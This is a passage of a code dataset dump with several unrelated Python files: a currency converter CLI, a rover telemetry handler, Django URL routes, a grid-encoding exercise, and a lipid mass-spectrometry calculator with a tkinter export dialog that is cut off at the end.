Dictionaries/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33418218403","text":"import requests\nimport json\nimport click\nfrom pyfiglet import Figlet\nfrom clint.textui import colored, puts, indent\n\nf = Figlet(font='slant')\n\n\n@click.command()\n@click.argument('num', type=float)\n@click.argument('base')\n@click.argument('symbols', default='')\ndef main(num, base, symbols):\n print(f.renderText(\"PyConverter\"))\n\n num = num\n base = base.upper()\n symbols = symbols.upper()\n\n exchange_data = load_exchange_data(base)\n\n try:\n display(calc_rate(num, exchange_data, base, symbols), num, base)\n\n except Exception:\n print(\"That's not the easter egg you're looking for...\")\n\n\ndef display(data, num, base):\n puts(f\"{num} {base} = \")\n with indent(6, quote=\" >\"):\n for k, v in data.items():\n puts(f\"{k}: {v}\")\n\n\n# calculate exchange\ndef calc_rate(num, exchange_data, base, symbols):\n rates = dict()\n\n # TOTALNIE NIE EASTER EGG\n if base != \"PLN\" and symbols == 'SASIN':\n raise Exception(\"NOT POSSIBLE\")\n\n elif symbols == 'SASIN':\n n = num / 70000000\n rates[symbols] = \"{:.20f}\".format(n)\n\n elif symbols == '':\n\n for key, value in exchange_data['rates'].items():\n rates[key] = value * num\n\n else:\n rates[symbols] = exchange_data['rates'][symbols] * num\n\n return rates\n\n\n# wczytanie / pobieranie danych\ndef load_exchange_data(base):\n try:\n with open(f\"exchangedata_{base}.json\", \"r\") as e_data:\n data = json.load(e_data)\n puts(colored.cyan(f\"USING CACHED DATA ({data['date']})\"))\n return data\n except IOError:\n return get_and_dump_rates(base)\n\n\n# pobieranie i zapisanie danych\ndef get_and_dump_rates(base):\n puts(colored.cyan(\"REQUESTING FOR \" + base))\n r = requests.get(\n f\"https://api.exchangeratesapi.io/latest?base={ base }\")\n\n with open(f\"exchangedata_{base}.json\", \"w\") as outfile:\n json.dump(r.json(), outfile)\n return r.json()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TheLukaszNs/PyConverter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2834093868","text":"#\n# Mars Rover Design Team\n# telemetry_handler.py\n#\n# Created on Oct 27, 2020\n# Updated on Aug 21, 2022\n#\n\nimport core\nfrom core.rovecomm_module.rovecomm import RoveCommPacket\nimport logging\n\n\ndef telemetry_handler(event, value, log_msg):\n \"\"\"\n Sends some numerical data over the socket\n\n :param event:\n :param value:\n :param log_msg:\n :return: success (int): An integer, either 0 or 1 depending on whether\n an exception occurred during writing\n \"\"\"\n\n logger = logging.getLogger(__name__)\n\n # Matches log 'event' to event from predefined dict\n if event in core.rovecomm_event_list:\n event_data = core.rovecomm_event_list[event]\n data_id = event_data[\"data_id\"]\n data_type = event_data[\"data_type\"]\n # If the event uses preset values, match the correct one\n if \"values\" in event_data:\n if value in event_data[\"values\"]:\n data_value = tuple(event_data[\"values\"][value])\n else:\n logger.warning(f\"{value} is not a valid value for {event}\")\n data_value = ()\n # Otherwise take the value literally\n else:\n data_value = value\n\n # Pack up and send the data\n packet = RoveCommPacket(data_id, data_type, data_value, \"\", 0)\n logger.info(f\"{event}: {value} - {log_msg}\")\n return core.rovecomm_node.write(packet, True)\n else:\n logger.warning(f\"{event} is not a valid event\")\n","repo_name":"MissouriMRDT/Autonomy_Software_Python","sub_path":"core/telemetry_handler.py","file_name":"telemetry_handler.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"54"} +{"seq_id":"17327297453","text":"from django.urls import path\nfrom . import views\nfrom .views import IndexView, MenuItemListView, MenuItemDetailView, MenuItemCreateView, MenuItemUpdateView, MenuItemDeleteView\n\nurlpatterns = [\n path('', IndexView.as_view(), name='index'),\n path('menu', MenuItemListView.as_view(), name='menu_item_list'),\n path('/', MenuItemDetailView.as_view(), name='menu_item_detail'),\n path('create/', MenuItemCreateView.as_view(), name='menu_item_create'),\n path('update//', MenuItemUpdateView.as_view(), name='menu_item_update'),\n path('delete//', MenuItemDeleteView.as_view(), name='menu_item_delete'),\n]","repo_name":"Nikosanton82/GReat","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71794915042","text":"def codifica(f, c):\n# Funcion que codifica la fila f y columna c\n #Nf = 9#Numero total de filas\n #Nc = 9#Numero total de columnas\n if ((f < 1) or (f > Nf)):\n print(\"Fila incorrecta! Debe ser un numero entre 1 y\", Nf)\n return None\n elif ((c < 1) or (c > Nc)):\n print(\"Columna incorrecta! Debe ser un numero entre 1 y\", Nc)\n return None\n else:\n n = Nc * (f - 1) + c\n return chr(255 + n)\n\n\ndef decodifica(x, Nf, Nc):\n# Funcion que codifica un caracter en su respectiva\n# fila f y columna c de la tabla\n n = ord(x) - 255\n if ((n < 1) or (n > Nf * Nc)):\n print(\"Caracter incorrecto! Debe estar entre 1 y\", Nf * Nc)\n return None\n else:\n n = n - 1\n f = int(n / Nc) + 1\n c = n % Nc + 1\n return f, c\n\n\n# Codificacion y decodificacion de una tabla\n# de Nf filas y Nc columnas\nNf = 9 # Numero de filas\nNc = 9 # Numero de columnas\nletrasProposicionales = [chr(i) for i in range(256, 256 + Nf*Nc)]\nprint(\"letrasProposicionales\")\nfor i in range(Nc):\n print(letrasProposicionales[Nf*(i):Nf*(i+1)])\n\n# Intente con varias opciones para fila y columna\nfila = 9\ncolumna = 5\nprint(\"La fila es\", fila)\nprint(\"La columna es\", columna)\nn = codifica(fila, columna)\nprint(\"La codificacion es\", n)\nf, c = decodifica(n, Nf, Nc)\nprint(\"La decodificacion es fila\", f, \"columna\", c)\n","repo_name":"EstefaniaLaverde/Torres_de_Hanoi","sub_path":"PROYECTO_LOGICA/Ejercicios de clase/codific_caballos.py","file_name":"codific_caballos.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73745718241","text":"# -*- coding: utf-8 -*-\n# %%\nimport pandas as pd\nimport numpy as np\nimport tkinter as tk\nclass package:\n def __init__(self):\n # elements defined\n C = 12\n H = 1.007825\n N = 14.003074\n O = 15.994915\n P = 30.973763\n S = 31.972072\n Na = 22.98977\n Cl = 34.968853\n self.elements = [C,H,N,O,P,S,Na,Cl]\n self.elementsymbol = ['C','H','N','O','P','S','Na','Cl']\n ionname = ['M','M+H','M+2H','M+H-H2O','M+2H-H2O','M+Na','M+2Na','M+2Na-H','M+NH4',\n 'M-H','M-2H','M-3H','M-4H','M-5H','M-H-H2O','M-2H-H2O','M-CH3','M+Cl','M+HCOO','M+OAc']\n ionfunc = []\n ionfunc.append(lambda ms: ms)\n ionfunc.append(lambda ms: ms+package().elements[1])\n ionfunc.append(lambda ms: (ms+2*package().elements[1])/2)\n ionfunc.append(lambda ms: ms-package().elements[1]-package().elements[3])\n ionfunc.append(lambda ms: (ms-package().elements[3])/2)\n ionfunc.append(lambda ms: ms+package().elements[6])\n ionfunc.append(lambda ms: (ms+2*package().elements[6])/2)\n ionfunc.append(lambda ms: ms-package().elements[1]+2*package().elements[6])\n ionfunc.append(lambda ms: ms+4*package().elements[1]+package().elements[2])\n ionfunc.append(lambda ms: ms-package().elements[1])\n ionfunc.append(lambda ms: (ms-2*package().elements[1])/2)\n ionfunc.append(lambda ms: (ms-3*package().elements[1])/3)\n ionfunc.append(lambda ms: (ms-4*package().elements[1])/4)\n ionfunc.append(lambda ms: (ms-5*package().elements[1])/5)\n ionfunc.append(lambda ms: ms-3*package().elements[1]-package().elements[3])\n ionfunc.append(lambda ms: (ms-4*package().elements[1]-package().elements[3])/2)\n ionfunc.append(lambda ms: ms-package().elements[0]-3*package().elements[1])\n ionfunc.append(lambda ms: ms+package().elements[7])\n ionfunc.append(lambda ms: ms+package().elements[0]+package().elements[1]+2*package().elements[3])\n ionfunc.append(lambda ms: ms+2*package().elements[0]+3*package().elements[1]+2*package().elements[3])\n self.ion = {}\n for i,j in enumerate(ionname):\n self.ion[j] = ionfunc[i]\n# %% [markdown]\n# Package for Sphingolipids \n\n# %%\n\nclass package_sl(package):\n def __init__(self):\n # base structure defined \n self.base = {'Cer': np.array([0,3,1,0]+[0]*(len(package().elements)-4)),\n 'Sphingosine': np.array([0,3,1,0]+[0]*(len(package().elements)-4)),\n 'Sphinganine': np.array([0,3,1,0]+[0]*(len(package().elements)-4))}\n # headgroups defined\n headgroup = ['Pi','Choline','Ethanolamine','Inositol','Glc','Gal','GalNAc','NeuAc','Fuc','NeuGc']\n formula = []\n formula.append(np.array([0,3,0,4,1]+[0]*(len(package().elements)-5)))\n formula.append(np.array([5,13,1,1]+[0]*(len(package().elements)-4)))\n formula.append(np.array([2,7,1,1]+[0]*(len(package().elements)-4)))\n formula.append(np.array([6,12,0,6]+[0]*(len(package().elements)-4)))\n formula.append(np.array([6,12,0,6]+[0]*(len(package().elements)-4)))\n formula.append(np.array([6,12,0,6]+[0]*(len(package().elements)-4)))\n formula.append(np.array([8,15,1,6]+[0]*(len(package().elements)-4)))\n formula.append(np.array([11,19,1,9]+[0]*(len(package().elements)-4)))\n formula.append(np.array([6,12,0,5]+[0]*(len(package().elements)-4)))\n formula.append(np.array([11,19,1,10]+[0]*(len(package().elements)-4)))\n self.components = self.base.copy()\n for i,j in enumerate(headgroup):\n self.components[j] = formula[i]\n # sn type defined\n sntype = ['none','d','t']\n snformula = []\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon-2*db,0,2]+[0]*(len(package().elements)-4)))\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon+2-2*db,0,3]+[0]*(len(package().elements)-4)))\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon+2-2*db,0,4]+[0]*(len(package().elements)-4)))\n self.sn = {}\n for i,j in enumerate(sntype):\n self.sn[j] = snformula[i]\n # extended structure\n nana = ['M','D','T','Q','P']\n iso = ['1a','1b','1c']\n namedf = pd.DataFrame({'0-series': ['LacCer'],'a-series': ['GM3'],'b-series': ['GD3'],'c-series': ['GT3']})\n namedf = namedf.append(pd.Series(['G'+'A'+'2' for name in namedf.iloc[0,0:1]]+['G'+i+'2' for i in nana[0:3]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series(['G'+'A'+'1' for name in namedf.iloc[0,0:1]]+['G'+i+j for i,j in zip(nana[0:3],iso)],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series(['G'+'M'+'1b' for name in namedf.iloc[0,0:1]]+['G'+i+j for i,j in zip(nana[1:4],iso)],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series(['G'+'D'+'1c' for name in namedf.iloc[0,0:1]]+['G'+i+j for i,j in zip(nana[2:],iso)],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series(['G'+'D'+'1α' for name in namedf.iloc[0,0:1]]+[i+'α' for i in namedf.iloc[4,1:]],index = namedf.columns), ignore_index=True)\n sequencedf = pd.DataFrame({'0-series': ['Gal-Glc-Cer'],'a-series': ['(NeuAc)-Gal-Glc-Cer'],'b-series': ['(NeuAc-NeuAc)-Gal-Glc-Cer'],'c-series': ['(NeuAc-NeuAc-NeuAc)-Gal-Glc-Cer']})\n sequencedf = sequencedf.append(pd.Series(['GalNAc-'+formula for formula in sequencedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Gal-'+formula for formula in sequencedf.iloc[1,:]],index = namedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['NeuAc-'+formula for formula in sequencedf.iloc[2,:]],index = namedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['NeuAc-'+formula for formula in sequencedf.iloc[3,:]],index = namedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['NeuAc-Gal-(NeuAc)-GalNAc-'+formula for formula in sequencedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n self.base = {'Cer': 'Cer','Sphingosine': 'Sphingosine','Sphinganine': 'Sphinganine','Sphingosine-1-Phosphate': 'Pi-Sphingosine','Sphinganine-1-Phosphate': 'Pi-Sphinganine',\n 'CerP': 'Pi-Cer','SM': 'Choline-Pi-Cer','CerPEtn': 'Ethanolamine-Pi-Cer','CerPIns': 'Inositol-Pi-Cer',\n 'LysoSM(dH)': 'Choline-Pi-Sphinganine','LysoSM': 'Choline-Pi-Sphingosine',\n 'GlcCer': 'Glc-Cer','GalCer': 'Gal-Cer'}\n for i in namedf:\n for j,k in enumerate(namedf[i]):\n self.base[k] = sequencedf[i][j]\n def basesn(self,base,typ):\n typ = base[typ].split('-')[-1]\n if 'Cer' == base[typ]:\n return [['d','t'],list(range(18,23)),':',[0,1],'/',['none','h'],list(range(12,33)),':',[0,1]]\n elif 'Sphingosine' == base[typ]:\n return [['d','t'],list(range(18,23)),':','1']\n elif 'Sphinganine' == base[typ]:\n return [['d','t'],list(range(18,23)),':','0']\n else:\n return 0\n def iterate(self,base,typ,start,end):\n typ = base[typ].split('-')[-1]\n start = pd.Series(start)\n end = pd.Series(end)\n start = start.replace('none','')\n end = end.replace('none','')\n if 'Cer' == base[typ]:\n return ['{}{}:{}/{}{}:{}'.format(i,j,k,l,m,n) for i in [start[0]] for k in range(int(start[2]),int(end[2])+1) for j in range(int(start[1]),int(end[1])+1) for n in range(int(start[5]),int(end[5])+1) for l in [start[3]] for m in range(int(start[4]),int(end[4])+1)]\n elif 'Sphingosine' == base[typ]:\n return ['{}{}:1'.format(i,j) for i in [start[0]] for j in range(int(start[1]),int(end[1])+1)]\n elif 'Sphinganine' == base[typ]:\n return ['{}{}:0'.format(i,j) for i in [start[0]] for j in range(int(start[1]),int(end[1])+1)]\n else:\n return 0\n# %% [markdown]\n# Package for Glycerophospholipids\n\n# %%\nclass package_gpl(package):\n def __init__(self):\n # base structure defined \n self.base = {'PA': np.array([3,9,0,6,1]+[0]*(len(package().elements)-5)),\n 'LysoPA': np.array([3,9,0,6,1]+[0]*(len(package().elements)-5))}\n # headgroups defined\n headgroup = ['Pi','Choline','Ethanolamine','Inositol','Glycerol']\n formula = []\n formula.append(np.array([0,3,0,4,1]+[0]*(len(package().elements)-5)))\n formula.append(np.array([5,13,1,1]+[0]*(len(package().elements)-4)))\n formula.append(np.array([2,7,1,1]+[0]*(len(package().elements)-4)))\n formula.append(np.array([6,12,0,6]+[0]*(len(package().elements)-4)))\n formula.append(np.array([3,8,0,3]+[0]*(len(package().elements)-4)))\n self.components = self.base.copy()\n for i,j in enumerate(headgroup):\n self.components[j] = formula[i]\n # sn type defined\n sntype = ['none','O','P']\n snformula = []\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon-2*db,0,2]+[0]*(len(package().elements)-4)))\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon+2-2*db,0,1]+[0]*(len(package().elements)-4)))\n snformula.append(lambda carbon,db: np.array([carbon,2*carbon-2*db,0,1]+[0]*(len(package().elements)-4)))\n self.sn = {}\n for i,j in enumerate(sntype):\n self.sn[j] = snformula[i]\n # extended structure(extended structure can be defined by library.baseext())\n namedf = pd.DataFrame({'a': ['PA'],'b': ['LysoPA']})\n namedf = namedf.append(pd.Series([name[0:-1]+'C' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'E' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'G' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'GP' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'I' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'IP' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'IP2' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n namedf = namedf.append(pd.Series([name[0:-1]+'IP3' for name in namedf.iloc[0,:]],index = namedf.columns), ignore_index=True)\n sequencedf = pd.DataFrame({'a': ['PA'],'b': ['LysoPA']})\n sequencedf = sequencedf.append(pd.Series(['Choline-'+name for name in sequencedf.iloc[0,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Ethanolamine-'+name for name in sequencedf.iloc[0,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Glycerol-'+name for name in sequencedf.iloc[0,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Pi-'+name for name in sequencedf.iloc[3,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Inositol-'+name for name in sequencedf.iloc[0,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Pi-'+name for name in sequencedf.iloc[5,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Pi-'+name for name in sequencedf.iloc[6,:]],index = sequencedf.columns), ignore_index=True)\n sequencedf = sequencedf.append(pd.Series(['Pi-'+name for name in sequencedf.iloc[7,:]],index = sequencedf.columns), ignore_index=True)\n self.base = {'PA': 'PA','LysoPA': 'LysoPA'}\n for i in namedf:\n for j,k in enumerate(namedf[i]):\n self.base[k] = sequencedf[i][j]\n def basesn(self,base,typ):\n typ = base[typ].split('-')[-1]\n if 'PA' == base[typ]:\n return [['none','O','P'],list(range(2,27)),':',[0,1,2,3,4,5,6],'/',['none','O','P'],list(range(2,27)),':',[0,1,2,3,4,5,6]]\n elif 'LysoPA' == base[typ]:\n return [['none','O','P'],list(range(2,27)),':',[0,1,2,3,4,5,6]]\n else:\n return 0\n def iterate(self,base,typ,start,end):\n typ = base[typ].split('-')[-1]\n start = pd.Series(start)\n end = pd.Series(end)\n start = start.replace('none','')\n end = end.replace('none','')\n if 'PA' == base[typ]:\n return ['{}{}:{}/{}{}:{}'.format(i,j,k,l,m,n) for i in [start[0]] for j in range(int(start[1]),int(end[1])+1) for k in range(int(start[2]),int(end[2])+1) for l in [start[3]] for m in range(int(start[4]),int(end[4])+1) for n in range(int(start[5]),int(end[5])+1)]\n elif 'LysoPA' == base[typ]:\n return ['{}{}:{}'.format(i,j,k) for i in [start[0]] for j in range(int(start[1]),int(end[1])+1) for k in range(int(start[2]),int(end[2])+1)]\n else:\n return 0\n# %% [markdown]\n# library class\n\n# %%\nclass library(package):\n def __init__(self,pack):\n self.elements = package().elements\n self.elementsymbol = package().elementsymbol\n self.ion = package().ion\n self.components = {}\n self.base = {}\n self.sn = {}\n self.basesnorg = []\n self.iterateorg = []\n for i,j in enumerate(pack):\n self.components = {**self.components,**j().components}\n self.base = {**self.base,**j().base}\n self.sn = {**self.sn,**j().sn}\n self.basesnorg.append(j().basesn)\n self.iterateorg.append(j().iterate)\n def basesn(self,typ):\n base = self.base\n for i in range(len(self.basesnorg)):\n if not self.basesnorg[i](base,typ) == 0:\n return self.basesnorg[i](base,typ)\n def iterate(self,typ,start,end):\n base = self.base\n for i in range(len(self.iterateorg)):\n if not self.iterateorg[i](base,typ,start,end) == 0:\n return self.iterateorg[i](base,typ,start,end)\n def newhgdef(self,newheadgroup,newformula):\n self.components[newheadgroup] = newformula\n def baseext(self,name,sequence):\n self.base[name] = sequence\n def mscomp(self,name):\n components = name.split('-')\n base = components[-1].split('(')[0]\n sn = components[-1].split('(')[1].split(')')[0].split('/')\n hg = '('+name.replace(base,'')+self.base[base]+')'\n hgcode = []\n s = 0\n hg = hg.split('-')\n hg.reverse()\n for i,j in enumerate(hg):\n if ')' in j:\n s += 1\n hgcode.append(s)\n if '(' in j:\n s+= -1\n hg[i] = j.replace('(','').replace(')','')\n code = []\n for i,j in enumerate(hgcode):\n if i == 0:\n code.append([0])\n elif hgcode[i-1] == j:\n new = code[i-1].copy()\n last = new[-1]+1\n new.pop()\n new.append(last)\n code.append(new)\n elif hgcode[i-1] < j:\n new = code[i-1].copy()\n new.append(0)\n code.append(new)\n elif hgcode[i-1] > j:\n pre = max([k for k in range(i) if hgcode[k] == j])\n new = code[pre].copy()\n last = new[-1]+1\n new.pop()\n new.append(last)\n code.append(new)\n comp = pd.DataFrame({'headgroups': hg,'position': code})\n return comp\n def msformula(self,name,mode):\n components = name.split('-')\n base = components[-1].split('(')[0]\n sn = components[-1].split('(')[1].split(')')[0].split('/')\n headgroups = components[0:-1]\n for hg in headgroups:\n if '(' in hg:\n if ')' not in hg.split('(')[1]:\n headgroups[headgroups.index(hg)] = hg.split('(')[1]\n elif ')' in hg.split('(')[1]:\n headgroups[headgroups.index(hg)] = hg.split('(')[1].split(')')[0]\n elif ')' in hg:\n headgroups[headgroups.index(hg)] = hg.split(')')[0]\n ms = np.array([0,2,0,1]+[0]*(len(self.elements)-4))\n H2O = np.array([0,2,0,1]+[0]*(len(self.elements)-4))\n for hg in headgroups:\n ms += self.components[hg]\n ms += -H2O \n components = self.base[base].split('-')\n for c in components:\n if '(' in c:\n if ')' not in c.split('(')[1]:\n components[components.index(c)] = c.split('(')[1]\n elif ')' in c.split('(')[1]:\n components[components.index(c)] = c.split('(')[1].split(')')[0]\n elif ')' in c:\n components[components.index(c)] = c.split(')')[0]\n for c in components:\n ms += self.components[c]\n ms += -H2O \n for sni in sn:\n if 'd' in sni:\n carbon = int(sni.split('d')[1].split(':')[0])\n db = int(sni.split('d')[1].split(':')[1])\n ms += self.sn['d'](carbon,db)\n elif 't' in sni:\n carbon = int(sni.split('t')[1].split(':')[0])\n db = int(sni.split('t')[1].split(':')[1])\n ms += self.sn['t'](carbon,db)\n elif 'O' in sni:\n carbon = int(sni.split('O')[1].split(':')[0])\n db = int(sni.split('O')[1].split(':')[1])\n ms += self.sn['O'](carbon,db)\n elif 'P' in sni:\n carbon = int(sni.split('P')[1].split(':')[0])\n db = int(sni.split('P')[1].split(':')[1])\n ms += self.sn['P'](carbon,db)\n else:\n carbon = int(sni.split(':')[0])\n db = int(sni.split(':')[1])\n ms += self.sn['none'](carbon,db)\n ms += -H2O\n if mode == 'raw':\n return ms\n elif mode == 'molecule':\n formulalist = [i+'{}'.format(j) for i,j in zip(self.elementsymbol[0:len(ms)],ms) if j > 0]\n formula = ''\n for f in formulalist:\n formula += f\n return formula\n def mscalculator(self,name,ion):\n ms = (self.msformula(name,mode='raw')*self.elements[0:len(self.msformula(name,mode='raw'))]).cumsum()[-1]\n return self.ion[ion](ms)\n def export(self):\n expwind = tk.Tk()\n expwind.title('Export settings')\n expwind.geometry('700x300')\n var_base = tk.StringVar()\n initialbase = list(self.base.keys())\n title = tk.Label(expwind,text = 'Select base')\n title.config(font=(\"Times New Roman\", 20))\n var_base.set(initialbase)\n listbox1 = tk.Listbox(expwind,listvariable = var_base,selectmode = 'extended')\n listbox1.config(font=(\"Times New Roman\", 12))\n var_add = tk.StringVar()\n subtitle = tk.Label(expwind,text = 'others')\n subtitle.config(font=(\"Times New Roman\", 15))\n other = tk.Entry(expwind,textvariable = var_add)\n other.config(font=(\"Times New Roman\", 12))\n def base_selection():\n global base_input \n base_input = [listbox1.get(i) for i in listbox1.curselection()]\n title.destroy()\n listbox1.destroy()\n button1.destroy() \n subtitle.destroy()\n other.destroy()\n addbutton.destroy()\n global sn_input\n sn_input = []\n def snloop(i,skip,add,apply):\n if skip == True:\n i += 1\n else:\n global menu_st,menu_end,var_st,var_end\n menu_st = []\n menu_end = []\n var_st = []\n var_end = []\n title = tk.Label(expwind,text = base_input[i])\n title.config(font=(\"Times New Roman\", 20))\n title.grid(row = 0,column = 0,padx=20)\n labelstart = tk.Label(expwind,text = 'start')\n labelstart.config(font=(\"Times New Roman\", 15))\n labelend = tk.Label(expwind,text = 'end')\n labelend.config(font=(\"Times New Roman\", 15))\n labelstart.grid(row = 1,column = 0,padx=20)\n label = []\n for n,sntype in enumerate(self.basesn(base_input[i])):\n if type(sntype) == str:\n label.append(tk.Label(expwind,text = sntype))\n label[-1].config(font=(\"Times New Roman\", 12))\n label[-1].grid(row = 1,column = n+1)\n else:\n var_st.append(tk.StringVar())\n menu_st.append(tk.OptionMenu(expwind,var_st[-1],*sntype))\n menu_st[-1].config(font=(\"Times New Roman\", 12))\n menu_st[-1].grid(row = 1,column = n+1)\n labelend.grid(row = 2,column = 0,padx=20)\n for n,sntype in enumerate(self.basesn(base_input[i])):\n if type(sntype) == str:\n label.append(tk.Label(expwind,text = sntype))\n label[-1].config(font=(\"Times New Roman\", 12))\n label[-1].grid(row = 2,column = n+1)\n elif type(sntype[0]) == str:\n label.append(tk.Label(expwind,text = ''))\n label[-1].config(font=(\"Times New Roman\", 12))\n label[-1].grid(row = 2,column = n+1)\n var_end.append(tk.StringVar())\n var_end[-1].set(var_st[n].get())\n menu_end.append(tk.OptionMenu(expwind,var_end[-1],*sntype))\n else:\n var_end.append(tk.StringVar())\n menu_end.append(tk.OptionMenu(expwind,var_end[-1],*sntype))\n menu_end[-1].config(font=(\"Times New Roman\", 12))\n menu_end[-1].grid(row = 2,column = n+1)\n i += 1\n def sn_selection():\n st = []\n end = []\n for n in range(len(menu_st)):\n st.append(var_st[n].get())\n end.append(var_end[n].get())\n menu_st[n].destroy()\n menu_end[n].destroy()\n for n in label:\n n.destroy()\n title.destroy()\n labelstart.destroy()\n labelend.destroy()\n button2.destroy()\n button3.destroy()\n button4.destroy()\n if add == True:\n sn_input[-1] = sn_input[-1]+self.iterate(base_input[i-1],st,end)\n else:\n sn_input.append(self.iterate(base_input[i-1],st,end))\n if i < len(base_input):\n snloop(i,skip = False,add = False,apply = False)\n else:\n cancel.destroy()\n ion_selection()\n def apply_all():\n st = []\n end = []\n for n in range(len(menu_st)):\n st.append(var_st[n].get())\n end.append(var_end[n].get())\n menu_st[n].destroy()\n menu_end[n].destroy()\n for n in label:\n n.destroy()\n title.destroy()\n labelstart.destroy()\n labelend.destroy()\n if apply == False:\n button2.destroy()\n button3.destroy()\n button4.destroy()\n if add == True:\n sn_input[-1] = sn_input[-1]+self.iterate(base_input[i-1],st,end)\n else:\n sn_input.append(self.iterate(base_input[i-1],st,end))\n if i < len(base_input):\n if self.basesn(base_input[i]) in [self.basesn(base_input[p]) for p in range(i)]:\n snloop(i,skip = True,add = False,apply = True)\n else: \n snloop(i,skip = False,add = False,apply = True)\n else:\n ion_selection()\n def add_other():\n st = []\n end = []\n for n in range(len(menu_st)):\n st.append(var_st[n].get())\n end.append(var_end[n].get())\n menu_st[n].destroy()\n menu_end[n].destroy()\n for n in label:\n n.destroy()\n title.destroy()\n labelstart.destroy()\n labelend.destroy()\n if apply == False:\n button2.destroy()\n button3.destroy()\n button4.destroy()\n if add == True:\n sn_input[-1] = sn_input[-1]+self.iterate(base_input[i-1],st,end)\n else:\n sn_input.append(self.iterate(base_input[i-1],st,end))\n if apply == True:\n snloop(i-1,skip = False,add = True,apply = True)\n else:\n snloop(i-1,skip = False,add = True,apply = False)\n if skip == False:\n if apply == False:\n button2 = tk.Button(expwind,text = 'confirm',command = sn_selection)\n button2.config(font=(\"Times New Roman\", 12))\n button2.grid(row = 3,column = 0)\n button3 = tk.Button(expwind,text = 'apply to others',command = apply_all)\n button3.config(font=(\"Times New Roman\", 12))\n button3.grid(row = 3,column = 1)\n button4 = tk.Button(expwind,text = 'add',command = add_other)\n button4.config(font=(\"Times New Roman\", 12))\n button4.grid(row = 3,column = 2)\n expwind.mainloop()\n else:\n index = [self.basesn(base_input[p]) for p in range(i-1)].index(self.basesn(base_input[i-1]))\n sn_input.append(sn_input[index])\n if i < len(base_input):\n if self.basesn(base_input[i]) in [self.basesn(base_input[p]) for p in range(i)]:\n snloop(i,skip = True,add = False,apply = False)\n else: \n snloop(i,skip = False,add = False,apply = False)\n else:\n cancel.destroy()\n ion_selection()\n snloop(0,skip = False,add = False,apply = False)\n def add_base():\n initialbase.append(other.get())\n var_base.set(initialbase)\n other.delete(first = 0,last = 100)\n def ion_selection():\n title1 = tk.Label(expwind,text = 'Select ions')\n title1.config(font=(\"Times New Roman\", 20))\n var_ion = tk.StringVar()\n var_ion.set(list(package().ion.keys()))\n listbox2 = tk.Listbox(expwind,listvariable = var_ion,selectmode = 'extended')\n listbox2.config(font=(\"Times New Roman\", 12))\n title1.grid(row = 0,column = 0,padx=100)\n listbox2.grid(row = 1,column = 0,padx=100)\n def filename_type():\n global ion_input\n ion_input = [listbox2.get(i) for i in listbox2.curselection()]\n title1.destroy()\n listbox2.destroy()\n button5.destroy()\n title2 = tk.Label(expwind,text = 'Type filename(with.xlsx)')\n title2.config(font=(\"Times New Roman\", 20))\n var_file = tk.StringVar(value = 'library.xlsx')\n file = tk.Entry(expwind,textvariable = var_file)\n file.config(font=(\"Times New Roman\", 12))\n title2.grid(row = 0,column = 0,padx=100)\n file.grid(row = 1,column = 0,padx=100)\n def export():\n global filename\n filename = var_file.get()\n self.toexcel()\n expwind.destroy()\n root()\n button6 = tk.Button(expwind,text = 'export',command = export)\n button6.config(font=(\"Times New Roman\", 12))\n button6.grid(row = 2,column = 0,padx=100)\n expwind.mainloop()\n button5 = tk.Button(expwind,text = 'confirm',command = filename_type)\n button5.config(font=(\"Times New Roman\", 12))\n button5.grid(row = 2,column = 0,padx=100)\n cancel = tk.Button(expwind,text = 'cancel',command = cancelrun)\n cancel.config(font=(\"Times New Roman\", 12))\n cancel.grid(row = 2,column = 1,padx=5)\n expwind.mainloop()\n def 